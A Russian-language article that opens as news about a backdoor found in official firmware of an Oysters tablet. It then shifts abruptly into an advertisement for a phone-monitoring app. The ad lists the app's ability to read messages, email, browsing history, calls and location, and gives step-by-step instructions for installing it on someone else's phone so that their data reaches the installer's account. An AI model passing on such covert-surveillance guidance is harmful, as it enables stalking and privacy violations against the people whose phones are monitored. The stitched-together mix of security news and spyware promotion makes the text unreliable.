Вредоносная программа найдена в официальной прошивке Android

ee19dca3278d7a1d9a5d489be189fb18

Специалисты «Доктор Веб» опубликовали информацию об очередном трояне, прошитом внутри прошивки Android. Уникальность этого раза состоит в том, что прошивка была не кастомной, а официальной! На данный момент программа Android.Backdoor.114.origi оказалась вшитой в оболочку планшета Oysters T104 HVi 3G, но не исключается и её присутствие в других моделях. Речь идёт о китайских брендах, малоизвестных и не слишком популярных.

Уже при первом запуске планшета Android.Backdoor.114.origin будет собирать информацию из него, а затем регулярно пересылать отчёты на подготовленные C&C серверы. Первичная передаваемая информация затрагивает модель устройства, версию прошивки, тип подключения к сети Интернет, страну пользователя, список установленных APK файлов и т.п. Полученная статистика служит плацдармом для скрытой загрузки приложений через С&C серверы. Возможна и их незаметная установка в смартфон жертвы.

Даже если соблюдать все меры безопасности, обеспечивать защиту смартфона это не сможет. Через вредоносное ПО могут устанавливаться рекламные и шпионские модули, работающие в фоне. Эти процессы могут никак себя не выдавать. Уже зарегистрированы случаи воровства платёжной информации и защищённых данных. Если изучить файловую систему Android, то можно обнаружить там GoogleQuickSearchBox.apk, под который и маскируется Android.Backdoor.114.origin. Производитель планшета об уязвимости уведомлён, однако никаких исправлений в программной среде пока не производилось.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.